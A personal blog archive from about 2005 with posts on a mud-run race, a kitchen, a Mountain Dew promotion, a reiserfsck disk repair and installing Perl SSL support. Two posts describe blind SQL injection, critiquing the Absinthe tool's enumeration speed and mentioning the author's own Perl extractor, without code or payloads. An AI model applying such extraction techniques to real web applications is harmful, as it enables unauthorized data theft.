I did a race yesterday called Muddy Buddy with Jason. It’s a 10K with 5 legs where one person runs one leg while the other is biking and you switch up at every leg. There are obstacles between the legs as well such as monkey bars, low wall, and a couple rope climbs. It was a pretty cool race, but a lot more difficult than I thought it would be. I should also mention there’s a big huge mud pit you have to crawl through at the end, hence the name Muddy Buddy. ;) Jason and I were pretty evenly matched, and did pretty well finishing with a time of 54 minutes, 36 seconds coming in 36th out of 60 in our division and 327th overall (out of 897 teams - official results). I sure do hurt today, and I’ve still got dirt coming out of various body parts, but I had a great time.
Pbcopy and Hexdumps
More Blind SQL
Success! I can now successfully extract data from a Blind SQL-vulnerable web application with under 500 lines of perl. And Absinthe, after running for the entire 3-day weekend+, is just now beginning to pull the actual table names. I’m not knocking it as it’s data retrieval is probably much more robust than mine, but I’m a sucker for immediate gratification.
Now I just need to prettify the output…
dances
Blind SQL Haxoring
I’ve been playing with 0x90’s Absinthe quite a bit lately and while it’s an amazing tool, I’m a little disappointed in some of the methods it uses to gather database information. According to the presentation given at BlackHat in ‘04, table id’s are gathered first and then the table names are gathered using that information. The same is done with fields. Through my usage, I’ve noticed two things wrong with this approach, at least in terms of speed.
First, although I’m not completely sure of the size of the id field, it can be quite large…at least 10 digits…and can range in value to any number that will fit in those 10 digits (or a signed 32-bit integer if you want to get technical…). However, every single time Absinthe tries to identify the id, the search_value (see pdf) is initialized at 2 and increases exponentially. This becomes an increasingly expensive operation as the id value becomes larger and larger. Why not sort the id’s in the SQL query and then initialize search_value with the previously identified id? It seems to me that would save quite a few queries, especially when blind SQL injection is quite the expensive operation in the first place.
Second, querying for the id’s isn’t quite necessary. I’ve had Absinthe running for over 24 hours straight and it’s still querying for id’s. In approximately that same amount of time, although not contiguous, I’ve been able to code up some perl to pull the database structure without any use of id’s. Granted it uses inner joins, which can also be somewhat expensive, but I get much more immediate results. Gotta love immediate gratification. :-)
Well enough of that…time to hit up the town!
02:25
2:25 am. I’m coming home after a late night out. Not too late, but late enough to bring out the guys asking for dollars for 4 quarters. I look to my right on the “L” platform and what do I see but a family of 4 - mother, father, and a set of twins. What could they be doing out this late, I wonder… What could they be doing that requires them to bring their poor sleeping daughters..slumped in their arms…out at this time of night. I may never know, but I can only hope I never have to do the same.
irritated
Activestate HTTPS
Compiling SSL support for Activestate perl is no fun task. I tried it one day (and succeeded) but it was still a pain and took the entire day. Thanks go to John Bokma for making it as easy as
ppm> install http://theoryx5.uwinnipeg.ca/ppms/Crypt-SSLeay.ppd
I haven’t verified that it works, but if somebody does please let me know!
Update - Confirmed, it works!
Yet Another Reason to Drink Mountain Dew
Looks like I have yet another reason to drink Mountain Dew.
Beginning August 28, 2005, Mountain Dew and Xbox® will select a winner of an Xbox 360™ gaming and entertainment system every 10 minutes, 24 hours a day, seven days a week, for nine weeks straight! That’s an Xbox 360 every 600 seconds!
Pepsi sure is being an advertising whore - they just wrapped up a promotion to win Apple iTunes songs on Pepsi bottle caps and now they’re promoting Microsoft’s Xbox 360. I’d much rather win a $400 Xbox and a $0.99 song, though…wouldn’t you?
More details on everytenminutes.com.
Identity Theft Steps Up a Notch
Schneier blogged this morning about how an identify thief managed to steal a house! Apparently, the thief had merely transferred the deed using a stolen SSN and drivers license number.
I’d be curious to see how the thief managed to get ahold of that information. That’s a crazy example of extreme identity theft, though.
The Kitchen
I put some pics of my kitchen up recently. It looks really nice in these pictures, but most of that is due to Stacey. Now I just need to work on getting some furniture in my living room!
Get Your Reiserfsck On
It sucks when your home directory partition gets foo bar’ed.
########### reiserfsck --rebuild-tree started at Wed Aug 17 03:33:36 2005 ########### Pass 0: Loading on-disk bitmap .. ok, 18207763 blocks marked used Skipping 8818 blocks (super block, journal, bitmaps) 18198945 blocks will be read 0% left 17928713, 5874 /sec
One of my partitions has begun acting up, causing oops in Linux and causing things to lock up. I hope this fixes it…and I hope I don’t end up with gobs of nameless files in lost+found. Luckily I was able to scratch up the 70gb required to back said home directories. Had to burn off a few rainbow crack tables, tho… ;)
Update That went flawless! I’m only missing one file, that I was already getting access denied to prior to the fix which meant it was having some issues anyway…
--- old_home-fixed.ls 2005-08-17 04:20:28.000000000 -0500 +++ old_home.ls 2005-08-17 03:29:23.000000000 -0500 @@ -4410,7 +4410,6 @@ /mnt/tmp/mp3/Dance-Techo-Electronic/Dream Dance Vol30: . .. -01-ATB - Sunset Girl.mp3 01-Dj Shog - Tribute.mp3 02-Chicane - Daylight.mp3 02-Woody Van Eyden - Unfinished Symphony.mp3